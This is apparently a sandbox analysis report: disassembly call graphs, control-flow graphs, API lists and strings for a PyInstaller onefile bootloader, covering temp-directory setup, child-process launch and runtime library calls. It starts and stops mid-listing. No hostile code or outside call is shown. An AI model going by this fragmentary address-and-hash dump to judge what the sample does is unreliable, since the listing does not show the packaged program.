7ff757144f08 _get_daylight 11 API calls 15948->15949 15950 7ff7571555a6 15949->15950 15988 7ff75714a8e0 15950->15988 15953 7ff7571555d1 15952->15953 15957 7ff75714fa92 15952->15957 15954 7ff757144f08 _get_daylight 11 API calls 15953->15954 15955 7ff7571555d6 15954->15955 15956 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 15955->15956 15956->15957 15957->15929 15958 7ff7571555f8 15957->15958 15959 7ff75714faa3 15958->15959 15960 7ff757155601 15958->15960 15959->15929 15959->15936 15961 7ff757144f08 _get_daylight 11 API calls 15960->15961 15962 7ff757155606 15961->15962 15963 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 15962->15963 15963->15959 16072 7ff7571502d8 EnterCriticalSection 15964->16072 16073 7ff75714b2c8 GetLastError 15971->16073 15973 7ff757144f11 15973->15938 15975 7ff75713c559 15974->15975 15976 7ff75713c564 15975->15976 15977 7ff75713c8e0 IsProcessorFeaturePresent 15975->15977 15978 7ff75713c8f8 15977->15978 16090 7ff75713cad8 RtlCaptureContext 15978->16090 15984 7ff75714a913 15983->15984 16095 7ff75714a614 15984->16095 15991 7ff75714a778 15988->15991 15990 7ff75714a8f9 15990->15947 15992 7ff75714a7a3 15991->15992 15995 7ff75714a814 15992->15995 15994 7ff75714a7ca 15994->15990 16005 7ff75714a55c 15995->16005 16000 7ff75714a84f 16000->15994 16001 7ff75714a900 _isindst 17 API calls 16002 7ff75714a8df 16001->16002 16003 7ff75714a778 _invalid_parameter_noinfo 37 API calls 16002->16003 16004 7ff75714a8f9 16003->16004 16004->15994 16006 7ff75714a578 GetLastError 16005->16006 16007 7ff75714a5b3 16005->16007 16008 7ff75714a588 16006->16008 16007->16000 16011 7ff75714a5c8 16007->16011 16014 7ff75714b390 16008->16014 16012 7ff75714a5fc 16011->16012 16013 7ff75714a5e4 GetLastError SetLastError 16011->16013 16012->16000 16012->16001 16013->16012 16015 7ff75714b3ca FlsSetValue 16014->16015 16016 7ff75714b3af FlsGetValue 16014->16016 16018 7ff75714b3d7 16015->16018 16020 7ff75714a5a3 SetLastError 16015->16020 16017 7ff75714b3c4 16016->16017 16016->16020 16017->16015 16031 7ff75714eb98 16018->16031 16020->16007 16021 7ff75714b3e6 16022 7ff75714b404 FlsSetValue 16021->16022 16023 7ff75714b3f4 FlsSetValue 16021->16023 16025 7ff75714b410 FlsSetValue 16022->16025 16026 7ff75714b422 16022->16026 16024 7ff75714b3fd 16023->16024 16038 7ff75714a948 16024->16038 16025->16024 16044 7ff75714aef4 16026->16044 16036 7ff75714eba9 _get_daylight 16031->16036 16032 7ff75714ebfa 16035 7ff757144f08 _get_daylight 10 API calls 16032->16035 16033 7ff75714ebde HeapAlloc 16034 7ff75714ebf8 16033->16034 16033->16036 16034->16021 16035->16034 16036->16032 16036->16033 16049 7ff757153590 16036->16049 16039 7ff75714a94d RtlFreeHeap 16038->16039 16040 7ff75714a97c 16038->16040 16039->16040 16041 7ff75714a968 GetLastError 16039->16041 16040->16020 16042 7ff75714a975 Concurrency::details::SchedulerProxy::DeleteThis 16041->16042 16043 7ff757144f08 _get_daylight 9 API calls 16042->16043 16043->16040 16058 7ff75714adcc 16044->16058 16052 7ff7571535d0 16049->16052 16057 7ff7571502d8 EnterCriticalSection 16052->16057 16070 7ff7571502d8 EnterCriticalSection 16058->16070 16074 7ff75714b309 FlsSetValue 16073->16074 16075 7ff75714b2ec 16073->16075 16076 7ff75714b31b 16074->16076 16079 7ff75714b2f9 16074->16079 16075->16074 16075->16079 16078 7ff75714eb98 _get_daylight 5 API calls 16076->16078 16077 7ff75714b375 SetLastError 16077->15973 16080 7ff75714b32a 16078->16080 16079->16077 16081 7ff75714b348 FlsSetValue 16080->16081 16082 7ff75714b338 FlsSetValue 16080->16082 16083 7ff75714b354 FlsSetValue 16081->16083 16084 7ff75714b366 16081->16084 16085 7ff75714b341 16082->16085 16083->16085 16087 7ff75714aef4 _get_daylight 5 API calls 16084->16087 16086 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16085->16086 16086->16079 16088 7ff75714b36e 16087->16088 16089 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16088->16089 16089->16077 16091 7ff75713caf2 RtlLookupFunctionEntry 16090->16091 16092 7ff75713cb08 RtlVirtualUnwind 16091->16092 16093 7ff75713c90b 16091->16093 16092->16091 16092->16093 16094 7ff75713c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16093->16094 16096 7ff75714a64e _isindst __scrt_get_show_window_mode 16095->16096 16097 7ff75714a676 RtlCaptureContext RtlLookupFunctionEntry 16096->16097 16098 7ff75714a6e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16097->16098 16099 7ff75714a6b0 RtlVirtualUnwind 16097->16099 16100 7ff75714a738 _isindst 16098->16100 16099->16098 16101 7ff75713c550 _log10_special 8 API calls 16100->16101 16102 7ff75714a757 GetCurrentProcess TerminateProcess 16101->16102 20570 7ff757145410 20571 7ff75714541b 20570->20571 20579 7ff75714f2a4 20571->20579 20592 7ff7571502d8 EnterCriticalSection 20579->20592 20593 7ff75715abe3 20594 7ff75715abf3 20593->20594 20597 7ff757145478 LeaveCriticalSection 20594->20597 18892 7ff75713bae0 18893 7ff75713bb0e 18892->18893 18894 7ff75713baf5 18892->18894 18894->18893 18896 7ff75714d5fc 12 API calls 18894->18896 18895 7ff75713bb6e 18896->18895 18897 7ff757149961 18898 7ff75714a3d8 45 API calls 18897->18898 18899 7ff757149966 18898->18899 18900 7ff75714998d GetModuleHandleW 18899->18900 18901 7ff7571499d7 18899->18901 18900->18901 18907 7ff75714999a 18900->18907 18909 7ff757149864 18901->18909 18907->18901 18923 7ff757149a88 GetModuleHandleExW 18907->18923 18929 7ff7571502d8 EnterCriticalSection 18909->18929 18924 7ff757149abc GetProcAddress 18923->18924 18925 7ff757149ae5 18923->18925 18926 7ff757149ace 18924->18926 18927 7ff757149aea FreeLibrary 18925->18927 18928 7ff757149af1 18925->18928 18926->18925 18927->18928 18928->18901 20449 7ff75715ad69 20452 7ff757145478 LeaveCriticalSection 20449->20452

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 7ff7571389e0-7ff757138b26 call 7ff75713c850 call 7ff757139390 SetConsoleCtrlHandler GetStartupInfoW call 7ff7571453f0 call 7ff75714a47c call 7ff75714871c call 7ff7571453f0 call 7ff75714a47c call 7ff75714871c call 7ff7571453f0 call 7ff75714a47c call 7ff75714871c GetCommandLineW CreateProcessW 23 7ff757138b28-7ff757138b48 GetLastError call 7ff757132c50 0->23 24 7ff757138b4d-7ff757138b89 RegisterClassW 0->24 31 7ff757138e39-7ff757138e5f call 7ff75713c550 23->31 26 7ff757138b8b GetLastError 24->26 27 7ff757138b91-7ff757138be5 CreateWindowExW 24->27 26->27 29 7ff757138be7-7ff757138bed GetLastError 27->29 30 7ff757138bef-7ff757138bf4 ShowWindow 27->30 32 7ff757138bfa-7ff757138c0a WaitForSingleObject 29->32 30->32 34 7ff757138c88-7ff757138c8f 32->34 35 7ff757138c0c 32->35 36 7ff757138cd2-7ff757138cd9 34->36 37 7ff757138c91-7ff757138ca1 WaitForSingleObject 34->37 39 7ff757138c10-7ff757138c13 35->39 42 7ff757138dc0-7ff757138dd9 GetMessageW 36->42 43 7ff757138cdf-7ff757138cf5 QueryPerformanceFrequency QueryPerformanceCounter 36->43 40 7ff757138df8-7ff757138e02 37->40 41 7ff757138ca7-7ff757138cb7 TerminateProcess 37->41 44 7ff757138c1b-7ff757138c22 39->44 45 7ff757138c15 GetLastError 39->45 46 7ff757138e11-7ff757138e35 GetExitCodeProcess CloseHandle * 2 40->46 47 7ff757138e04-7ff757138e0a DestroyWindow 40->47 48 7ff757138cb9 GetLastError 41->48 49 7ff757138cbf-7ff757138ccd WaitForSingleObject 41->49 52 7ff757138ddb-7ff757138de9 TranslateMessage DispatchMessageW 42->52 53 7ff757138def-7ff757138df6 42->53 50 7ff757138d00-7ff757138d38 MsgWaitForMultipleObjects PeekMessageW 43->50 44->37 51 7ff757138c24-7ff757138c41 PeekMessageW 44->51 45->44 46->31 47->46 48->49 49->40 54 7ff757138d3a 50->54 55 7ff757138d73-7ff757138d7a 50->55 56 7ff757138c76-7ff757138c86 WaitForSingleObject 51->56 57 7ff757138c43-7ff757138c74 TranslateMessage DispatchMessageW PeekMessageW 51->57 52->53 53->40 53->42 58 7ff757138d40-7ff757138d71 TranslateMessage DispatchMessageW PeekMessageW 54->58 55->42 59 7ff757138d7c-7ff757138da5 QueryPerformanceCounter 55->59 56->34 56->39 57->56 57->57 58->55 58->58 59->50 60 7ff757138dab-7ff757138db2 59->60 60->40 61 7ff757138db4-7ff757138db8 60->61 61->42
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                      • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                      • API String ID: 3832162212-3165540532
                                                                                                      • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                      • Instruction ID: a87926d3a182f2498721b0cd23dfee798eab5913200bb316100906738fdbb2bb
                                                                                                      • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                      • Instruction Fuzzy Hash: 63D16331A08A8A86EF64AF38F8542ADB761FFC5758FC80135DA5D53A94DF3CD1468720

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 62 7ff757131000-7ff757133806 call 7ff75713fe18 call 7ff75713fe20 call 7ff75713c850 call 7ff7571453f0 call 7ff757145484 call 7ff7571336b0 76 7ff757133808-7ff75713380f 62->76 77 7ff757133814-7ff757133836 call 7ff757131950 62->77 78 7ff757133c97-7ff757133cb2 call 7ff75713c550 76->78 82 7ff75713391b-7ff757133931 call 7ff7571345c0 77->82 83 7ff75713383c-7ff757133856 call 7ff757131c80 77->83 90 7ff75713396a-7ff75713397f call 7ff757132710 82->90 91 7ff757133933-7ff757133960 call 7ff757137f90 82->91 87 7ff75713385b-7ff75713389b call 7ff757138830 83->87 96 7ff75713389d-7ff7571338a3 87->96 97 7ff7571338c1-7ff7571338cc call 7ff757144f30 87->97 101 7ff757133c8f 90->101 99 7ff757133962-7ff757133965 call 7ff75714004c 91->99 100 7ff757133984-7ff7571339a6 call 7ff757131c80 91->100 102 7ff7571338af-7ff7571338bd call 7ff7571389a0 96->102 103 7ff7571338a5-7ff7571338ad 96->103 109 7ff7571339fc-7ff757133a2a call 7ff757138940 call 7ff7571389a0 * 3 97->109 110 7ff7571338d2-7ff7571338e1 call 7ff757138830 97->110 99->90 115 7ff7571339b0-7ff7571339b9 100->115 101->78 102->97 103->102 138 7ff757133a2f-7ff757133a3e call 7ff757138830 109->138 119 7ff7571338e7-7ff7571338ed 110->119 120 7ff7571339f4-7ff7571339f7 call 7ff757144f30 110->120 115->115 118 7ff7571339bb-7ff7571339d8 call 7ff757131950 115->118 118->87 130 7ff7571339de-7ff7571339ef call 7ff757132710 118->130 124 7ff7571338f0-7ff7571338fc 119->124 120->109 127 7ff7571338fe-7ff757133903 124->127 128 7ff757133905-7ff757133908 124->128 127->124 127->128 128->120 131 7ff75713390e-7ff757133916 call 7ff757144f30 128->131 130->101 131->138 141 7ff757133b45-7ff757133b53 138->141 142 7ff757133a44-7ff757133a47 138->142 143 7ff757133b59-7ff757133b5d 141->143 144 7ff757133a67 141->144 142->141 145 7ff757133a4d-7ff757133a50 142->145 146 7ff757133a6b-7ff757133a90 call 7ff757144f30 143->146 144->146 147 7ff757133a56-7ff757133a5a 145->147 148 7ff757133b14-7ff757133b17 145->148 157 7ff757133aab-7ff757133ac0 146->157 158 7ff757133a92-7ff757133aa6 call 7ff757138940 146->158 147->148 152 7ff757133a60 147->152 149 7ff757133b19-7ff757133b1d 148->149 150 7ff757133b2f-7ff757133b40 call 7ff757132710 148->150 149->150 153 7ff757133b1f-7ff757133b2a 149->153 159 7ff757133c7f-7ff757133c87 150->159 152->144 153->146 161 7ff757133be8-7ff757133bfa call 7ff757138830 157->161 162 7ff757133ac6-7ff757133aca 157->162 158->157 159->101 170 7ff757133c2e 161->170 171 7ff757133bfc-7ff757133c02 161->171 164 7ff757133bcd-7ff757133be2 call 7ff757131940 162->164 165 7ff757133ad0-7ff757133ae8 call 7ff757145250 162->165 164->161 164->162 175 7ff757133aea-7ff757133b02 call 7ff757145250 165->175 176 7ff757133b62-7ff757133b7a call 7ff757145250 165->176 177 7ff757133c31-7ff757133c40 call 7ff757144f30 170->177 173 7ff757133c1e-7ff757133c2c 171->173 174 7ff757133c04-7ff757133c1c 171->174 173->177 174->177 175->164 188 7ff757133b08-7ff757133b0f 175->188 186 7ff757133b87-7ff757133b9f call 7ff757145250 176->186 187 7ff757133b7c-7ff757133b80 176->187 184 7ff757133d41-7ff757133d63 call 7ff7571344e0 177->184 185 7ff757133c46-7ff757133c4a 177->185 199 7ff757133d71-7ff757133d82 call 7ff757131c80 184->199 200 7ff757133d65-7ff757133d6f call 7ff757134630 184->200 189 7ff757133c50-7ff757133c5f call 7ff7571390e0 185->189 190 7ff757133cd4-7ff757133ce6 call 7ff757138830 185->190 201 7ff757133bac-7ff757133bc4 call 7ff757145250 186->201 202 7ff757133ba1-7ff757133ba5 186->202 187->186 188->164 204 7ff757133c61 189->204 205 7ff757133cb3-7ff757133cb6 call 7ff757138660 189->205 206 7ff757133ce8-7ff757133ceb 190->206 207 7ff757133d35-7ff757133d3c 190->207 214 7ff757133d87-7ff757133d96 199->214 200->214 201->164 216 7ff757133bc6 201->216 202->201 211 7ff757133c68 call 7ff757132710 204->211 221 7ff757133cbb-7ff757133cbd 205->221 206->207 212 7ff757133ced-7ff757133d10 call 7ff757131c80 206->212 207->211 224 7ff757133c6d-7ff757133c77 211->224 229 7ff757133d2b-7ff757133d33 call 7ff757144f30 212->229 230 7ff757133d12-7ff757133d26 call 7ff757132710 call 7ff757144f30 212->230 219 7ff757133d98-7ff757133d9f 214->219 220 7ff757133dc4-7ff757133dda call 7ff757139390 214->220 216->164 219->220 226 7ff757133da1-7ff757133da5 219->226 232 7ff757133de8-7ff757133e04 SetDllDirectoryW 220->232 233 7ff757133ddc 220->233 222 7ff757133cc8-7ff757133ccf 221->222 223 7ff757133cbf-7ff757133cc6 221->223 222->214 223->211 224->159 226->220 231 7ff757133da7-7ff757133dbe SetDllDirectoryW LoadLibraryExW 226->231 229->214 230->224 231->220 237 7ff757133e0a-7ff757133e19 call 7ff757138830 232->237 238 7ff757133f01-7ff757133f08 232->238 233->232 251 7ff757133e1b-7ff757133e21 237->251 252 7ff757133e32-7ff757133e3c call 7ff757144f30 237->252 242 7ff757134008-7ff757134010 238->242 243 7ff757133f0e-7ff757133f15 238->243 245 7ff757134012-7ff75713402f PostMessageW GetMessageW 242->245 246 7ff757134035-7ff757134067 call 7ff7571336a0 call 7ff757133360 call 7ff757133670 call 7ff757136fc0 call 7ff757136d70 242->246 243->242 244 7ff757133f1b-7ff757133f25 call 7ff7571333c0 243->244 244->224 258 7ff757133f2b-7ff757133f3f call 7ff7571390c0 244->258 245->246 255 7ff757133e2d-7ff757133e2f 251->255 256 7ff757133e23-7ff757133e2b 251->256 263 7ff757133ef2-7ff757133efc call 7ff757138940 252->263 264 7ff757133e42-7ff757133e48 252->264 255->252 256->255 269 7ff757133f41-7ff757133f5e PostMessageW GetMessageW 258->269 270 7ff757133f64-7ff757133fa7 call 7ff757138940 call 7ff7571389e0 call 7ff757136fc0 call 7ff757136d70 call 7ff7571388e0 258->270 263->238 264->263 268 7ff757133e4e-7ff757133e54 264->268 272 7ff757133e5f-7ff757133e61 268->272 273 7ff757133e56-7ff757133e58 268->273 269->270 310 7ff757133fa9-7ff757133fbf call 7ff757138ed0 call 7ff7571388e0 270->310 311 7ff757133ff5-7ff757133ffc call 7ff757131900 270->311 272->238 275 7ff757133e67-7ff757133e83 call 7ff757136dc0 call 7ff757137340 272->275 274 7ff757133e5a 273->274 273->275 274->238 289 7ff757133e8e-7ff757133e95 275->289 290 7ff757133e85-7ff757133e8c 275->290 293 7ff757133e97-7ff757133ea4 call 7ff757136e00 289->293 294 7ff757133eaf-7ff757133eb9 call 7ff7571371b0 289->294 292 7ff757133edb-7ff757133ef0 call 7ff757132a50 call 7ff757136fc0 call 7ff757136d70 290->292 292->238 293->294 308 7ff757133ea6-7ff757133ead 293->308 304 7ff757133ebb-7ff757133ec2 294->304 305 7ff757133ec4-7ff757133ed2 call 7ff7571374f0 294->305 304->292 305->238 318 7ff757133ed4 305->318 308->292 310->311 323 7ff757133fc1-7ff757133fd6 310->323 317 7ff757134001-7ff757134003 311->317 317->224 318->292 324 7ff757133fd8-7ff757133feb call 7ff757132710 call 7ff757131900 323->324 325 7ff757133ff0 call 7ff757132a50 323->325 324->224 325->311
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastModuleName
                                                                                                      • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                      • API String ID: 2776309574-3273434969
                                                                                                      • Opcode ID: 290103749316f0d0a9742f0bd6683294d220285c3ec01147ab5031e66cc0817f
                                                                                                      • Instruction ID: aa212da91b6a1a88af91c736ef6f1585701b3f216ce28fcf7050a33ea9054266
                                                                                                      • Opcode Fuzzy Hash: 290103749316f0d0a9742f0bd6683294d220285c3ec01147ab5031e66cc0817f
                                                                                                      • Instruction Fuzzy Hash: 71328F21A0C68E91FF29BB29F5552B9E651AFC4780FCC4132DA5D432D6EF2CE55AC320

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 479 7ff757155c00-7ff757155c3b call 7ff757155588 call 7ff757155590 call 7ff7571555f8 486 7ff757155e65-7ff757155eb1 call 7ff75714a900 call 7ff757155588 call 7ff757155590 call 7ff7571555f8 479->486 487 7ff757155c41-7ff757155c4c call 7ff757155598 479->487 512 7ff757155eb7-7ff757155ec2 call 7ff757155598 486->512 513 7ff757155fef-7ff75715605d call 7ff75714a900 call 7ff757151578 486->513 487->486 493 7ff757155c52-7ff757155c5c 487->493 494 7ff757155c7e-7ff757155c82 493->494 495 7ff757155c5e-7ff757155c61 493->495 498 7ff757155c85-7ff757155c8d 494->498 497 7ff757155c64-7ff757155c6f 495->497 500 7ff757155c7a-7ff757155c7c 497->500 501 7ff757155c71-7ff757155c78 497->501 498->498 502 7ff757155c8f-7ff757155ca2 call 7ff75714d5fc 498->502 500->494 505 7ff757155cab-7ff757155cb9 500->505 501->497 501->500 510 7ff757155cba-7ff757155cc6 call 7ff75714a948 502->510 511 7ff757155ca4-7ff757155ca6 call 7ff75714a948 502->511 521 7ff757155ccd-7ff757155cd5 510->521 511->505 512->513 522 7ff757155ec8-7ff757155ed3 call 7ff7571555c8 512->522 531 7ff75715606b-7ff75715606e 513->531 532 7ff75715605f-7ff757156066 513->532 521->521 524 7ff757155cd7-7ff757155ce8 call 7ff757150474 521->524 522->513 534 7ff757155ed9-7ff757155efc call 7ff75714a948 GetTimeZoneInformation 522->534 524->486 533 7ff757155cee-7ff757155d44 call 7ff75715a4d0 * 4 call 7ff757155b1c 524->533 537 7ff7571560a5-7ff7571560b8 call 7ff75714d5fc 531->537 538 7ff757156070 531->538 535 7ff7571560fb-7ff7571560fe 532->535 592 7ff757155d46-7ff757155d4a 533->592 548 7ff757155fc4-7ff757155fee call 7ff757155580 call 7ff757155570 call 7ff757155578 534->548 549 7ff757155f02-7ff757155f23 534->549 541 7ff757156073 call 7ff757155e7c 535->541 542 7ff757156104-7ff75715610c call 7ff757155c00 535->542 557 7ff7571560ba 537->557 558 7ff7571560c3-7ff7571560de call 7ff757151578 537->558 538->541 553 7ff757156078-7ff7571560a4 call 7ff75714a948 call 7ff75713c550 541->553 542->553 555 7ff757155f2e-7ff757155f35 549->555 556 7ff757155f25-7ff757155f2b 549->556 564 7ff757155f37-7ff757155f3f 555->564 565 7ff757155f49 555->565 556->555 559 7ff7571560bc-7ff7571560c1 call 7ff75714a948 557->559 576 7ff7571560e5-7ff7571560f7 call 7ff75714a948 558->576 577 7ff7571560e0-7ff7571560e3 558->577 559->538 564->565 566 7ff757155f41-7ff757155f47 564->566 572 7ff757155f4b-7ff757155fbf call 7ff75715a4d0 * 4 call 7ff757152b5c call 7ff757156114 * 2 565->572 566->572 572->548 576->535 577->559 594 7ff757155d4c 592->594 595 7ff757155d50-7ff757155d54 592->595 594->595 595->592 596 7ff757155d56-7ff757155d7b call 7ff757146b58 595->596 602 7ff757155d7e-7ff757155d82 596->602 604 7ff757155d84-7ff757155d8f 602->604 605 7ff757155d91-7ff757155d95 602->605 604->605 607 7ff757155d97-7ff757155d9b 604->607 605->602 609 7ff757155e1c-7ff757155e20 607->609 610 7ff757155d9d-7ff757155dc5 call 7ff757146b58 607->610 612 7ff757155e27-7ff757155e34 609->612 613 7ff757155e22-7ff757155e24 609->613 619 7ff757155dc7 610->619 620 7ff757155de3-7ff757155de7 610->620 615 7ff757155e36-7ff757155e4c call 7ff757155b1c 612->615 616 7ff757155e4f-7ff757155e5e call 7ff757155580 call 7ff757155570 612->616 613->612 615->616 616->486 623 7ff757155dca-7ff757155dd1 619->623 620->609 625 7ff757155de9-7ff757155e07 call 7ff757146b58 620->625 623->620 626 7ff757155dd3-7ff757155de1 623->626 631 7ff757155e13-7ff757155e1a 625->631 626->620 626->623 631->609 632 7ff757155e09-7ff757155e0d 631->632 632->609 633 7ff757155e0f 632->633 633->631
                                                                                                      APIs
                                                                                                      • _get_daylight.LIBCMT ref: 00007FF757155C45
                                                                                                        • Part of subcall function 00007FF757155598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7571555AC
                                                                                                        • Part of subcall function 00007FF75714A948: RtlFreeHeap.NTDLL(?,?,?,00007FF757152D22,?,?,?,00007FF757152D5F,?,?,00000000,00007FF757153225,?,?,?,00007FF757153157), ref: 00007FF75714A95E
                                                                                                        • Part of subcall function 00007FF75714A948: GetLastError.KERNEL32(?,?,?,00007FF757152D22,?,?,?,00007FF757152D5F,?,?,00000000,00007FF757153225,?,?,?,00007FF757153157), ref: 00007FF75714A968
                                                                                                        • Part of subcall function 00007FF75714A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF75714A8DF,?,?,?,?,?,00007FF75714A7CA), ref: 00007FF75714A909
                                                                                                        • Part of subcall function 00007FF75714A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF75714A8DF,?,?,?,?,?,00007FF75714A7CA), ref: 00007FF75714A92E
                                                                                                      • _get_daylight.LIBCMT ref: 00007FF757155C34
                                                                                                        • Part of subcall function 00007FF7571555F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75715560C
                                                                                                      • _get_daylight.LIBCMT ref: 00007FF757155EAA
                                                                                                      • _get_daylight.LIBCMT ref: 00007FF757155EBB
                                                                                                      • _get_daylight.LIBCMT ref: 00007FF757155ECC
                                                                                                      • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF75715610C), ref: 00007FF757155EF3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                      • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                      • API String ID: 4070488512-239921721
                                                                                                      • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                      • Instruction ID: dc75ffd0559b545f1a2ef20d22685a7345f590bf612a098fc5aa7f1d51831852
                                                                                                      • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                      • Instruction Fuzzy Hash: 91D1A722E1824A45EF28BF2AE8411B9E762EFC4794FCC4135EA4D47695DF3CE4438B60

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 693 7ff757156964-7ff7571569d7 call 7ff757156698 696 7ff7571569d9-7ff7571569e2 call 7ff757144ee8 693->696 697 7ff7571569f1-7ff7571569fb call 7ff757148520 693->697 702 7ff7571569e5-7ff7571569ec call 7ff757144f08 696->702 703 7ff7571569fd-7ff757156a14 call 7ff757144ee8 call 7ff757144f08 697->703 704 7ff757156a16-7ff757156a7f CreateFileW 697->704 720 7ff757156d32-7ff757156d52 702->720 703->702 705 7ff757156afc-7ff757156b07 GetFileType 704->705 706 7ff757156a81-7ff757156a87 704->706 712 7ff757156b09-7ff757156b44 GetLastError call 7ff757144e7c CloseHandle 705->712 713 7ff757156b5a-7ff757156b61 705->713 709 7ff757156ac9-7ff757156af7 GetLastError call 7ff757144e7c 706->709 710 7ff757156a89-7ff757156a8d 706->710 709->702 710->709 718 7ff757156a8f-7ff757156ac7 CreateFileW 710->718 712->702 728 7ff757156b4a-7ff757156b55 call 7ff757144f08 712->728 716 7ff757156b69-7ff757156b6c 713->716 717 7ff757156b63-7ff757156b67 713->717 723 7ff757156b72-7ff757156bc7 call 7ff757148438 716->723 724 7ff757156b6e 716->724 717->723 718->705 718->709 731 7ff757156bc9-7ff757156bd5 call 7ff7571568a0 723->731 732 7ff757156be6-7ff757156c17 call 7ff757156418 723->732 724->723 728->702 731->732 740 7ff757156bd7 731->740 738 7ff757156c1d-7ff757156c5f 732->738 739 7ff757156c19-7ff757156c1b 732->739 742 7ff757156c81-7ff757156c8c 738->742 743 7ff757156c61-7ff757156c65 738->743 741 7ff757156bd9-7ff757156be1 call 7ff75714aac0 739->741 740->741 741->720 745 7ff757156d30 742->745 